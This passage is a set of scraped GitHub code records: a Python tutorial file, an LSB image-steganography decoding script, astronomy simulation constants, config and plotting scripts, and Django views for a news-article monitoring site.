value(s) of variables; w: print stack trace; \n Testing: 3 type of test result; 1- OK: passed the test, 2- FAIL: assertion error exception occured, 3- ERROR: an exception occured(other than AssertionError)\n \n\"\"\"\n\"\"\"File I/O\"\"\"\nfile1 = open(\"first.txt\", mode=\"w\", encoding=\"utf-8\")\n# print(\"is file1 writable:\",file1.writable())\nfile1.write(\"This is calling from file1\\n\")\n# print(\"no of file1:\",file1.fileno())\n# print(\"current position of file1 cursor:\",file1.tell())\nfile1.seek(5)\nfile1.write(\"was\")\n# print(\"is file1 readable:\",file1.readable())\n# print(file1.close())\nfile1 = open(\"first.txt\",mode=\"r\", encoding=\"utf-8\")\n# print(\"read file1:\",file1.read(), end=\"\")\nfile1.close()\nwith open(\"second.txt\",\"a+\",encoding=\"utf-8\") as file2: # no need to close\n file2.write(\"It is from file2, r u ready?\\n\")\n file2.seek(3,0) # second argument define starting point; 0 for beginning, 1 for current, 2 for end of file\n file2.write(\"was \") # didn't work\n file2.seek(0)\n # print(\"read file2:\",file2.read(5))\n # print(\"read file2:\",file2.readline(), end=\"\")\n # print(\"file2 name:\",file2.name)\n # 
print(\"is file2 closed:\",file2.closed)\n # print(\"file2 mode:\",file2.mode)\n # print(\"file2 encoding:\",file2.encoding)\n # print(\"file2 errors:\",file2.errors)\n # print(\"file2 newlines:\",file2.newlines, end=\"\")\n # print(\"file2 buffer:\",file2.buffer)\n\"\"\"pathlib module\"\"\"\n# print(pathlib.Path.cwd())\n# print(pathlib.Path.home())\n# print(pathlib.Path(\"/it/is/a/directory\"))\n# print(pathlib.Path.home() / \"It\" / \"is\" / \"also\" / \"a\" / \"directory\")\n# print(pathlib.Path.home().joinpath(\"It\", \"is\", \"also\", \"a\", \"directory\"))\npath = pathlib.Path.cwd() / \"testing.txt\"\npath2 = pathlib.Path.cwd() / \"2testing2.txt\"\nwith open(path,\"w\") as file1:\n file1.write(\"It is testing 1\\n\")\nwith path2.open(\"w\") as file2:\n file2.write(\"It is testing 2\\n\")\n# print(path.read_text(), end=\"\") # read as text\n# print(path2.read_bytes(), end=\"\") # read as binary\npath.write_text(\"I am adding to testing 1\\n\") # write as text\npath2.write_bytes(b\"I am adding to 2testing2\\n\") # write as binary\n# print(path2.read_bytes())\n# print(path2.read_text(), end=\"\")\n# print(path2.resolve()) # full directory\n# print(path.parent) # parent directory\n# print(path.parent == pathlib.Path.cwd()) # they are same because path is created as full directory\npath3 = pathlib.Path(\"abc.txt\")\n# print(path3.parent) # Attention !!!\n# print(path3.parent == pathlib.Path.cwd()) # they are not same because path3 is represented as .\n# print(\"name:\",path2.name)\n# print(\"stem:\",path2.stem)\n# print(\"anchor:\",path2.anchor)\n# print(\"drive:\",path2.drive)\n# print(\"parts:\",path2.parts)\n# print(\"root:\",path2.root)\n# print(\"suffix:\",path2.suffix)\n# print(\"as_uri:\",path2.as_uri())\n# print(\"as_posix:\",path2.as_posix())\n# print(\"as_posix:\",list(path2.parents))\n# print(list(pathlib.Path.cwd().glob(\"*.py\")))\npath4 = pathlib.Path.cwd() / \"file io files\"\nif path4.exists():\n # print(\"'File io files' is created\")\n pass\npath2.replace(path4)\n\"\"\"Regular Expressions\"\"\"\npattern = 'ac..ve{1}'\nstring = \"it is an acvivee program for activeveness and acsivedd\"\n# print(re.findall(pattern, string))\n# print(re.findall('a.', string))\n# print(re.split(\"ve\", string))\n# print((re.search(\"v\", string)))\n# print(re.search('[ab]', \"it is not truae\"))\n# print(re.search('[a-f,1-47]', \"it is no7t tru\"))\n# print(re.search('[a-f,1-47]', \"it is no7t tru\"))\n# print(re.search('..', \"it is not trnou\").span())\n# print(re.search('..', \"it is not trnou\").string)\n# print(re.search('..', \"it is not trnou\").re)\n# print(re.search('..', \"it is not trnou\").group())\n# print(re.match('^i', \"it is not trnou\"))\n# print(re.search('^i.*u$', \"it is not trnou\"))\n# print(re.findall('is*s', \"it is a good issf iss that doissz doiss\"))\n# print(re.split('is*s', \"it is a good issf iss that doissz doiss\"))\n# print(re.sub('is*s', \"doo\", \"it is a good issf iss that doissz doiss\"))\n# print(re.search('is*s', \"it is a good issf iss that doissz doiss\"))\n\"\"\"Debugging\"\"\"\n# breakpoint()\n# print(\"x\")\ndef f1():\n print(\"it is f1\")\n def f2():\n print(\"it is f2\")\n for _ in range(10):\n print(_, end=\"-\")\n def f3():\n print(\"it is f3\")\n f3()\n f2()\n# f1()\n# print(\"it is main\")\n\"\"\"Testing\"\"\"\ndef isitokay(a, b):\n c = a > b\n return c\ndef funcy(vava):\n\n raise TypeError if type(vava) != int else None\n\nclass Tester(unittest.TestCase):\n\n def test_1(self): # every test starting with test_ will run automatically\n # No 
need to call these test functions. Python will test if they start with test_\n\n val1 = 5; val2=\"0\"; expected = False\n # result = isitokay(val1, val2)\n # self.assertEqual(result, expected)\n self.assertRaises(TypeError, funcy, val2)\n def test_2(self):\n\n val1 = [1,2,3]; val2 = 4; expected = False\n result = isitokay(val1, val2)\n self.assertEqual(result, expected)\n self.assertTrue(not result)\n self.assertFalse(result)\n\nprint(re.findall(\"[0-9]{3}-[0-9]{7}\", \"531-0314929111-2131232\"))","repo_name":"dev7hka/My_Python_Tutorial","sub_path":"part4.py","file_name":"part4.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25967623766","text":"# -*- coding:utf-8 -*-\nfrom PIL import Image\n\n\ndef mod(x, y):\n return x % y\n\n\ndef toasc(strr):\n return int(strr, 2)\n\n\n# le为所要提取的信息的长度,str1为加密载体图片的路径,str2为提取文件的保存路径\ndef func(le, str1, str2):\n a = ''\n b = ''\n im = Image.open(str1)\n lenth = le * 8\n width = im.size[0]\n height = im.size[1]\n count = 0\n for h in range(0, height):\n for w in range(0, width):\n # 获得(w,h)点像素的值\n pixel = im.getpixel((w, h))\n # 此处余3,依次从R、G、B三个颜色通道获得最低位的除\n if count % 3 == 0:\n count += 1\n b = b + str((mod(int(pixel[0]), 2)))\n if count == lenth:\n break\n if count % 3 == 1:\n count += 1\n b = b + str((mod(int(pixel[1]), 2)))\n if count == lenth:\n break\n if count % 3 == 2:\n count += 1\n b = b + str((mod(int(pixel[2]), 2)))\n if count == lenth:\n break\n if count == lenth:\n break\n with open(str2, \"wb\") as f:\n for i in range(0, len(b), 8):\n # 以每8位为一组二进制,转换为十进制\n stra = toasc(b[i:i + 8])\n # 将转换后的十注制数视为ascii码:再转换为字符中写入到文件中\n f.write(chr(stra).encode())\n stra = ''\n f.close()\n\n\n# 文件长度\nle = 30\n# 含有隐藏信息的图片\nnew = r\"tu_LSB1.png\"\n# 信息提取出后所存放的文件\ntiqu = r\"get_flag.txt\"\nfunc(le, new, tiqu)\n","repo_name":"wgf4242/text","sub_path":"docs/ctf/scripts/archive/LSB_decode.py","file_name":"LSB_decode.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"77"} +{"seq_id":"36223611907","text":"import numpy as np\n\n# Physical constants\ngrav_const = 4.*np.pi**2 # in AU^3 yr^-2 solar_mass^-1\nc = 2.998e8 / 1.496e11 * 365.25 * 24. * 60. * 60. # AU yr^-1\nplanck = 6.62608e-27\n\n# Data structure parameters\nmaxnplanets = 30\nmincomponents = 1 # Minimum number of disk components, warm dust / exo-zodi required\nmaxcomponents = 3 # Maximum number of disk components, highest plausible is 3-4.\n\n# File paths\nexovistapath = './'\nlqq_dir = 'lqq_files/'\n\n# Define debris disk grain sizes\n'''\nIf we did Mie theory on the fly using dustmap, we'd have to use\na LOT of different grain sizes to average over Mie ringing\nartifacts. Instead, we have pre-calculated Qabs and Qsca\nfor different grain size ranges (in lqq_files folder).\nHere is the master list of pre-calculated grain sizes we can\nselect from. 
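A quick sanity-check sketch (mine, not part of the pipeline): the hard-coded tables below can be regenerated from the commented-out theory variables, that is, 47 log-spaced bins between 0.1 and 1000 at size resolution 5, with master_rdust as the geometric mean of adjacent boundaries.

import numpy as np

sizeres = 5.
lnmin, lnmax = np.log(0.1), np.log(1000.)
nsizes = int(np.ceil((lnmax - lnmin) * sizeres))            # 47 bins
boundaries = np.exp(np.linspace(lnmin, lnmax, nsizes + 1))  # 48 edges, 0.1 ... 1000
centers = np.sqrt(boundaries[:-1] * boundaries[1:])         # reproduces master_rdust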
I previously determined a size resolution ~ 5 was\nsufficient to accurately reproduce Qsca and Qabs for any distribution\nof grain sizes.\n'''\n\n# Variables used in theory to generate the dust filenames procedurally.\n'''\nsizeres = 5.\nmaster_maxsize = 1000.\nmaster_minsize = 0.1\ndlnsize = 1./sizeres\nmaster_lnmaxsize = np.log(master_maxsize)\nmaster_lnminsize = np.log(master_minsize)\nmaster_nsizes = int(np.ceil((master_lnmaxsize-master_lnminsize)/dlnsize))\n'''\n\n# Arrays needed to generate the exact dust filenames.\nmaster_rdust = np.array([0.1103, 0.1342, 0.1632, 0.1986, 0.2415, 0.2938, 0.3574, 0.4348, 0.5289, 0.6434, 0.7827, 0.9522, 1.1583, 1.4091, 1.7141, 2.0852, 2.5366, 3.0858, 3.7538, 4.5664, 5.5550, 6.7575, 8.2204, 10.0000, 12.1648, 14.7983, 18.0019, 21.8991, 26.6399, 32.4070, 39.4225, 47.9569, 58.3388, 70.9682, 86.3317, 105.0211, 127.7565, 155.4138, 189.0584, 229.9864, 279.7748, 340.3416, 414.0202, 503.6490, 612.6804, 745.3159, 906.6649])\n\nmaster_rdust_boundaries = np.array([0.1000, 0.1216, 0.1480, 0.1800, 0.2190, 0.2664, 0.3241, 0.3942, 0.4796, 0.5834, 0.7097, 0.8633, 1.0502, 1.2776, 1.5541, 1.8906, 2.2999, 2.7977, 3.4034, 4.1402, 5.0365, 6.1268, 7.4532, 9.0666, 11.0294, 13.4171, 16.3217, 19.8551, 24.1534, 29.3822, 35.7430, 43.4808, 52.8937, 64.3444, 78.2739, 95.2190, 115.8323, 140.9082, 171.4126, 208.5206, 253.6620, 308.5758, 375.3775, 456.6408, 555.4957, 675.7517, 822.0413, 1000.0001])\n\nmaster_nsizes = len(master_rdust_boundaries)\nmaster_drdust = master_rdust_boundaries[1:master_nsizes]-master_rdust_boundaries[0:master_nsizes-1]\n\n# Table headings\nstarbase = {'ID':0, 'HIP':0, 'TYC':'', 'dist':10., 'M_V':0., 'Vmag':0., 'Bmag':0., 'Umag':float('nan'), 'Rmag':float('nan'), 'Imag':float('nan'), 'Jmag':float('nan'), 'Hmag':float('nan'), 'Kmag':float('nan'), 'Type':'', 'Lstar':0., 'logg':0., 'Teff':0., 'angdiam':0., 'mass':0., 'rstar':0., 'RA':0., 'Dec':0., 'pmRA':0., 'pmDec':0., 'BmV':0., 'PA':0., 'I':60., 'Spectrum':None}\nalias = {'ID':'ID', 'HIP':'HIP', 'TYC':'TYC', 'dist':'dist', 'MV':'M_V', 'Vmag':'Vmag', 'Bmag':'Bmag', 'Umag':'Umag', 'Rmag':'Rmag', 'Imag':'Imag', 'Jmag':'Jmag', 'Hmag':'Hmag', 'Kmag':'Kmag', 'Type':'Type', 'SpT':'Type', 'Lstar':'Lstar', 'Lum':'Lstar', 'logg':'logg', 'Teff':'Teff', 'angdiam':'angdiam', 'mass':'mass', 'mstar':'mass', 'rstar':'rstar', 'rad':'rstar', 'RA':'RA', 'De':'Dec', 'pmRA':'pmRA', 'pmDe':'pmDec', 'BmV':'BmV', 'PA':'PA', 'Inc':'I', 'Spectrum':'Spectrum'}\nintlist = ['ID', 'HIP']\nstrlist = ['TYC', 'WDS', 'Type', 'Spectrum']\nkeplist = ('a','e','i','longnode','argperi','meananom')\npllabel = ('M','R','a','e','i','longnode','argperi','meananom')\ndlabel = ('n', 'longnode', 'i', 'nzodis', 'r', 'dror', 'rinner', 'eta', 'hor', 'g0', 'g1', 'g2', 'w0', 'w1', 'w2')\n\n# FITS file comments\nscomments = {'PA':'System midplane position angle (deg)',\n 'I':'System midplane inclination (deg)',\n 'ID':'Internal catalog #',\n 'HIP':'Hipparcos designation',\n 'TYC':'Tycho/Tycho-2 designation',\n 'dist':'Distance (pc)',\n 'Vmag':'Absolute V band mag',\n 'Type':'Spectral type',\n 'Lstar':'Bolometric luminosity (solar luminosities)',\n 'Teff':'Effective temperature (K)',\n 'angdiam':'Angular diameter (mas)',\n 'mass':'Mass (solar masses)',\n 'Rstar':'Radius (solar radii)'}\n\npcomments = {'M':'Mass (Earth masses)',\n 'R':'Radius (Earth radii)',\n 'a':'Semi-major axis (AU)',\n 'e':'Eccentricity',\n 'i':'Inclination (deg)',\n 'longnode':'Longitude of ascending node (deg)',\n 'argperi':'Argument of pericenter (deg)',\n 'meananom':'Mean anomaly 
(deg)'}\n\ndcomments = {'longnode':'longitude of ascending node (deg)',\n 'i':'inclination (deg)',\n 'nzodis':'exozodi level (zodis)',\n 'r':'peak density radius (AU)',\n 'dror':'Gaussian peak width',\n 'rinner':'truncation radius (AU)',\n 'eta':'T_PR/T_coll',\n 'hor':'scale height',\n 'g0':'HG scattering asym. parameter 1',\n 'w0':'HG function weight 1',\n 'g1':'HG scattering asym. parameter 2',\n 'w1':'HG function weight 2',\n 'g2':'HG scattering asym. parameter 3',\n 'w2':'HG function weight 3'}\n","repo_name":"alexrhowe/ExoVista","sub_path":"src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"27164176183","text":"import os\nfrom collections import namedtuple\nimport collections\nimport collections.abc\n\nimport json\n\n\nbase_config = {\n \"preprocess_config\":{\n \"sample_rate\":16000,\n \"origin_wavpath\": \"$BASE_PATH/../DATA/temp_data/temp_input\",\n \"target_wavpath\": \"$BASE_PATH/../DATA/temp_data/temp_out\",\n \"mc_dir\": \"$BASE_PATH/../DATA/temp_data/temp_mc\",\n \"num_workers\": None\n },\n \"npz_path\":\"$BASE_PATH/../DATA/temp_data/npz_files\",\n \"origin_wav_name\": \"$BASE_PATH/../DATA/temp_data/temp_input/temp_speaker/temp_speaker_source.wav\",\n \"speakers\" : [\"p262\", \"p272\", \"p229\", \"p232\", \"p292\", \"p293\", \"p360\", \"p361\", \"p248\", \"p251\", \"#蔡英文\", \"#韓國瑜\", \"#馬英九\"],\n \"speakers_image\":{\"#蔡英文\":\"$BASE_PATH/images/english.png\",\n \"#韓國瑜\":\"$BASE_PATH/images/fish.gif\",\n \"#馬英九\":\"$BASE_PATH/images/horse.jpeg\"},\n \"default_image\":\"$BASE_PATH/images/convict.jpg\",\n \"convert_config\" : {\n \"num_speakers\" : 10,\n \"num_converted_wavs\" : 1,\n \"resume_iters\" : 175000,\n \"src_spk\" : \"temp_speaker\",\n \"trg_spk\" : \"p262\",\n \"train_data_dir\":\"$BASE_PATH/../DATA/temp_data/temp_mc/\",\n \"test_data_dir\" :\"$BASE_PATH/../DATA/temp_data/temp_mc/\",\n \"wav_dir\" : \"$BASE_PATH/../DATA/temp_data/temp_out\",\n \"log_dir\" : \"./logs\",\n \"model_save_dir\" : \"$BASE_PATH/model_util/model_backend/models\",\n \"convert_dir\" : \"$BASE_PATH/model_util/converted\"\n }\n}\n\n\ndef replace_token_to_pwd(base_DICT, token):\n for k, v in base_DICT.items():\n if isinstance(v, collections.abc.Mapping):\n base_DICT[k] = replace_token_to_pwd(base_DICT.get(k, {}), token)\n elif isinstance(v, str):\n base_DICT[k] = v.replace(token, os.getcwd())\n else:\n pass\n return base_DICT\n \n\nif __name__ == \"__main__\":\n token = \"$BASE_PATH\"\n config = replace_token_to_pwd(base_config, token)\n print(config)\n config_path = os.path.join(os.getcwd(), \"config.json\")\n json.dump(config, open(config_path,'w'), ensure_ascii=False)\n","repo_name":"mistake0316/AIA_VC","sub_path":"gen_config.py","file_name":"gen_config.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"39967865948","text":"import openpyxl\nimport os\nimport urllib.request\n\nfile_name = '打卡情况.xlsx'\n\n\ndef download(img_url):\n head = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\"}\n request = urllib.request.Request(img_url, headers=head)\n try:\n response = urllib.request.urlopen(request)\n img_name = 'dd.png'\n path = \".\\\\\" + img_name\n if response.getcode() == 200:\n with open(path, 'wb') as f:\n f.write(response.read())\n 
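            # note: the read() above buffers the whole image in memory before
            # writing; fine for small pictures, but shutil.copyfileobj(response, f)
            # inside the "with" block would stream large files chunk by chunk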
return path\n except:\n return 'failed'\n\n\nif __name__ == '__main__':\n main_book = openpyxl.load_workbook('test(收集结果)_20220224.xlsx')\n main_sheet = main_book.active\n print(type(main_sheet.cell(2, 4).hyperlink.target))\n download(\"https://docimg10.docs.qq.com/image/OWINGk49ZusyQD2pdKNyog.jpeg?w=1152&h=2376&_type=jpeg\")\n","repo_name":"skyTEAM-w/Pack-Imagines","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28892875017","text":"import os\nimport json\nfrom optparse import OptionParser\nfrom collections import defaultdict, Counter\n\nimport seaborn\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom time_periods.common import congress_to_year\n\n\ndef main():\n usage = \"%prog\"\n parser = OptionParser(usage=usage)\n parser.add_option('--test-file', type=str, default='data/speeches/Congress/linear/test.tokenized.jsonlist',\n help='Test file: default=%default')\n parser.add_option('--weight-file', type=str, default='data/speeches/Congress/linear/weights.nontest.npz',\n help='Weight file: default=%default')\n parser.add_option('--outdir', type=str, default='plots/',\n help='Weight file: default=%default')\n\n (options, args) = parser.parse_args()\n\n test_file = options.test_file\n weight_file = options.weight_file\n outdir = options.outdir\n add_labels = True\n\n if not os.path.exists(outdir):\n os.makedirs(outdir)\n\n stopwords = {}\n\n with open(test_file) as f:\n lines = f.readlines()\n lines = [json.loads(line) for line in lines]\n data = np.load(weight_file)\n\n pro_counters_by_congress = defaultdict(Counter)\n anti_counters_by_congress = defaultdict(Counter)\n tone_counters_by_congress = defaultdict(Counter)\n for line in lines:\n congress = int(line['congress'])\n tone = line['tone']\n for sent in line['tokens']:\n tokens = [t for t in sent if t == t.lower()]\n tone_counters_by_congress[congress].update(tokens)\n if tone == 'pro':\n pro_counters_by_congress[congress].update(tokens)\n elif tone == 'anti':\n anti_counters_by_congress[congress].update(tokens)\n\n print(list(data.keys()))\n vocab = data['vocab']\n weights = data['weights']\n vocab_size = len(vocab)\n n_congesses = len(pro_counters_by_congress)\n print(vocab_size, n_congesses)\n print(weights.shape)\n vocab_index = dict(zip(vocab, range(vocab_size)))\n\n pro_freq_by_congress = defaultdict(Counter)\n anti_freq_by_congress = defaultdict(Counter)\n tone_freq_by_congress = defaultdict(Counter)\n congresses = sorted(pro_counters_by_congress)\n pro_sum_by_congress = Counter()\n anti_sum_by_congress = Counter()\n tone_sum_by_congress = Counter()\n for congress in congresses:\n tone_sum = sum(tone_counters_by_congress[congress].values())\n tone_freq_by_congress[congress] = Counter({t: v / tone_sum for t, v in tone_counters_by_congress[congress].items()})\n tone_sum_by_congress[congress] = tone_sum\n pro_sum = sum(pro_counters_by_congress[congress].values())\n pro_freq_by_congress[congress] = Counter({t: v / pro_sum for t, v in pro_counters_by_congress[congress].items()})\n pro_sum_by_congress[congress] = pro_sum\n anti_sum = sum(anti_counters_by_congress[congress].values())\n anti_freq_by_congress[congress] = Counter({t: v / anti_sum for t, v in anti_counters_by_congress[congress].items()})\n anti_sum_by_congress[congress] = anti_sum\n\n pro_weights_by_congress = np.zeros([vocab_size, n_congesses])\n pro_freqs_by_congress_np = np.zeros([vocab_size, n_congesses])\n 
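    # "Impact" below is (linear-model weight) x (relative term frequency): a
    # term only moves a congress's pro/anti signal if it is both strongly
    # weighted and actually used in that congress. The per-congress weight is
    # the base term weight plus the offset of the decorated "term__congress"
    # feature when one exists in the vocabulary (for example, base "term" plus
    # "term__85" for the 85th Congress); anti impacts use the negated weight,
    # i.e. the same weight vector read in the opposite direction.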
pro_impacts_by_congress = np.zeros([vocab_size, n_congesses])\n anti_weights_by_congress = np.zeros([vocab_size, n_congesses])\n anti_freqs_by_congress_np = np.zeros([vocab_size, n_congesses])\n anti_impacts_by_congress = np.zeros([vocab_size, n_congesses])\n n_found = 0\n for c_i, congress in enumerate(congresses):\n for t_i, term in enumerate(vocab):\n parts = term.split('__')\n if len(parts) == 1:\n pro_freq = pro_freq_by_congress[congress][term]\n anti_freq = anti_freq_by_congress[congress][term]\n weight = weights[0, t_i]\n decorated = term + '__' + str(congress)\n if decorated in vocab_index:\n weight += weights[0, vocab_index[decorated]]\n n_found += 1\n pro_weights_by_congress[t_i, c_i] = weight\n pro_freqs_by_congress_np[t_i, c_i] = pro_freq\n pro_impacts_by_congress[t_i, c_i] = weight * pro_freq\n anti_weights_by_congress[t_i, c_i] = -weight\n anti_freqs_by_congress_np[t_i, c_i] = anti_freq\n anti_impacts_by_congress[t_i, c_i] = -weight * anti_freq\n\n n_words, n_congresses = pro_impacts_by_congress.shape\n extended = np.zeros([n_words, n_congresses+4])\n extended_freq = np.zeros([n_words, n_congresses+4])\n totals = np.zeros(n_congresses+4)\n for i in range(5):\n extended[:, i:i+n_congresses] += pro_impacts_by_congress\n extended_freq[:, i:i+n_congresses] += pro_freqs_by_congress_np\n totals[i:i+n_congresses] += 1\n pro_impacts_by_congress_smoothed = extended[:, 2:-2] / totals[2:-2]\n\n n_words, n_congresses = anti_impacts_by_congress.shape\n extended = np.zeros([n_words, n_congresses+4])\n extended_freq = np.zeros([n_words, n_congresses+4])\n totals = np.zeros(n_congresses+4)\n for i in range(5):\n extended[:, i:i+n_congresses] += anti_impacts_by_congress\n extended_freq[:, i:i+n_congresses] += anti_freqs_by_congress_np\n totals[i:i+n_congresses] += 1\n anti_impacts_by_congress_smoothed = extended[:, 2:-2] / totals[2:-2]\n\n min_pro_impacts = np.min(pro_impacts_by_congress_smoothed, axis=1)\n median_pro_impacts = np.median(pro_impacts_by_congress_smoothed, axis=1)\n max_pro_impacts = np.max(pro_impacts_by_congress_smoothed, axis=1)\n median_pro_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(median_pro_impacts)])\n max_pro_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(max_pro_impacts)])\n\n min_anti_impacts = np.min(anti_impacts_by_congress, axis=1)\n median_anti_impacts = np.median(anti_impacts_by_congress_smoothed, axis=1)\n max_anti_impacts = np.max(anti_impacts_by_congress_smoothed, axis=1)\n median_anti_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(median_anti_impacts)])\n max_anti_impacts = np.array([v if vocab[i] not in stopwords else 0 for i, v in enumerate(max_anti_impacts)])\n\n seaborn.reset_orig()\n seaborn.set(font_scale=1.35)\n seaborn.set_palette('Paired')\n\n fig, ax = plt.subplots(nrows=2, figsize=(10, 7))\n plt.subplots_adjust(hspace=0.3)\n\n topn = 12\n years = [congress_to_year(c) for c in congresses]\n\n order = np.argsort(max_pro_impacts)[::-1]\n for i in order[:topn]:\n print(vocab[i], min_pro_impacts[i], median_pro_impacts[i], max_pro_impacts[i])\n\n indices = [i for i in order[:topn]]\n\n rows = [np.maximum(np.zeros_like(pro_impacts_by_congress_smoothed[i, :]), pro_impacts_by_congress_smoothed[i, :]) for i in indices]\n labels = [vocab[i] for i in indices]\n\n matrix = np.vstack(rows)\n sums = matrix.sum(0)\n matrix = matrix / sums\n\n ax[0].stackplot(years, matrix, labels=labels, alpha=0.8)\n\n if add_labels:\n ax[0].text(1943, 0.92, labels[11], 
color='white', fontsize=11)\n ax[0].text(2012, 0.87, labels[10], color='k', fontsize=7)\n ax[0].text(1892, 0.89, labels[9], color='white', fontsize=9)\n ax[0].text(1963, 0.78, labels[8], color='k', fontsize=11)\n ax[0].text(1915, 0.78, labels[7], color='white', fontsize=14)\n ax[0].text(1900, 0.59, labels[6], color='k', fontsize=14)\n ax[0].text(1935, 0.57, labels[5], color='white', fontsize=14)\n ax[0].text(1985, 0.7, labels[4], color='k', fontsize=12)\n ax[0].text(1988, 0.53, labels[3], color='white', fontsize=14)\n ax[0].text(1898, 0.11, labels[2], color='k', fontsize=13)\n ax[0].text(2005, 0.14, labels[1], color='white', fontsize=14)\n ax[0].text(1960, 0.1, labels[0], color='k', fontsize=16)\n else:\n ax[0].legend(loc='upper left', bbox_to_anchor=(1,1))\n handles, labels = ax[0].get_legend_handles_labels()\n ax[0].legend(handles[::-1], labels[::-1], loc='upper left', bbox_to_anchor=(1, 1))\n\n ax[0].set_title('Pro-immigration terms')\n ax[0].set_ylabel('Normalized impact')\n\n order = np.argsort(max_anti_impacts)[::-1]\n for i in order[:topn]:\n print(vocab[i], min_anti_impacts[i], median_anti_impacts[i], max_anti_impacts[i])\n\n indices = [i for i in order[:topn]]\n\n rows = [np.maximum(np.zeros_like(anti_impacts_by_congress_smoothed[i, :]), anti_impacts_by_congress_smoothed[i, :]) for i in indices]\n labels = [vocab[i] for i in indices]\n\n matrix = np.vstack(rows)\n sums = matrix.sum(0)\n matrix = matrix / sums\n\n ax[1].stackplot(years, matrix, labels=labels, alpha=0.8)\n\n if add_labels:\n ax[1].text(2007, 0.96, labels[11], color='white', fontsize=8)\n ax[1].text(1943, 0.93, labels[10], color='k', fontsize=12)\n ax[1].text(1959, 0.8, labels[9], color='white', fontsize=9)\n ax[1].text(2000, 0.87, labels[8], color='k', fontsize=8)\n ax[1].text(1921, 0.75, labels[7], color='white', fontsize=14)\n ax[1].text(1947, 0.73, labels[6], color='k', fontsize=9)\n ax[1].text(1943, 0.62, labels[5], color='white', fontsize=12)\n ax[1].text(1914, 0.58, labels[4], color='k', fontsize=11)\n ax[1].text(1882, 0.35, labels[3], color='white', fontsize=14)\n ax[1].text(1933, 0.23, labels[2], color='k', fontsize=16)\n ax[1].text(2005, 0.4, labels[1], color='white', fontsize=15)\n ax[1].text(1978, 0.13, labels[0], color='k', fontsize=16)\n else:\n ax[1].legend(loc='upper left', bbox_to_anchor=(1,1))\n handles, labels = ax[1].get_legend_handles_labels()\n ax[1].legend(handles[::-1], labels[::-1], loc='upper left', bbox_to_anchor=(1, 1))\n\n ax[1].set_title('Anti-immigration terms')\n ax[1].set_ylabel('Normalized impact')\n\n for k in range(2):\n ax[k].set_xlim(1880, 2020)\n ax[k].set_ylim(0, 1)\n\n if add_labels:\n plt.savefig(os.path.join(outdir, 'tone_linear_impact_with_labels.pdf'), bbox_inches='tight')\n plt.savefig(os.path.join(outdir, 'tone_linear_impact_with_labels.png'), bbox_inches='tight')\n else:\n plt.savefig(os.path.join(outdir, 'tone_linear_impact.pdf'), bbox_inches='tight')\n plt.savefig(os.path.join(outdir, 'tone_linear_impact.png'), bbox_inches='tight')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dallascard/immigration-speeches","sub_path":"plotting/make_tone_impact_plot.py","file_name":"make_tone_impact_plot.py","file_ext":"py","file_size_in_byte":10404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26572860381","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Article,Blog_Post # Import your model for data storage\nimport threading\nimport time\nfrom 
rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import ArticleSerializer\nfrom .rss_scraper import gather_data\nfrom .entity_manager import update_database\n\n\ndef print_value(request):\n if request.method == 'POST':\n submitted_value = request.POST.get('expression', '')\n # You can print the value or perform any other action here\n print(submitted_value)\n return HttpResponse(submitted_value)\n\n\ndef rss_test(request):\n titles = gather_data()\n return render(request,'rss_titles.html', {'titles': titles})\n\ndef get_terms_on_sites(request):\n if request.method == 'GET':\n submitted_values = request.GET.getlist('expression') # Get a list of submitted expressions\n\n\n articles = Article.objects.filter(term__in=submitted_values) # Retrieve articles with terms in the submitted list\n\n return render(request, 'articles.html', {'articles': articles})\n\n return HttpResponse(\"Form submitted successfully\")\n\n\ndef view_articles(request):\n if request.method == 'GET':\n submitted_value = request.GET.get('expression', '')\n articles = Article.objects.filter(term=submitted_value) # Retrieve all articles from the database\n return render(request, 'articles.html', {'articles': articles})\n return HttpResponse(\"Form submitted successfully\")\n\n\ndef periodic_task():\n while True:\n update_database() # Call your function\n time.sleep(900) # Sleep for 5 minutes (300 seconds)\n\n\ndef start_periodic_task(request):\n periodic_thread = threading.Thread(target=periodic_task)\n periodic_thread.daemon = True # This ensures the thread terminates when the main program does\n periodic_thread.start()\n return HttpResponse(\"Adatbázis frissítése\")\n\n\ndef list_entries(request):\n entries = Blog_Post.objects.all()\n return render(request, 'entry_list.html', {'entries': entries})\n\n\ndef index(request):\n entries = Blog_Post.objects.all()\n return render(request, 'index.html',{'entries': entries})\n\n\nclass ArticleList(APIView):\n def get(self, request):\n articles = Article.objects.all()\n serializer = ArticleSerializer(articles, many=True)\n return Response(serializer.data)\n","repo_name":"hartvigmarton/mediaBiasMonitor","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72397396090","text":"import json\nimport uuid\n\nfrom distutils.util import strtobool\n\nfrom django.core.exceptions import ObjectDoesNotExist, PermissionDenied\nfrom django.contrib.auth.models import User, Group, Permission\nfrom django.db import transaction\nfrom django.forms.models import model_to_dict\nfrom django.http import HttpResponseNotFound\nfrom django.http import HttpResponse\nfrom django.http import Http404\nfrom django.http import HttpResponseBadRequest, JsonResponse\nfrom 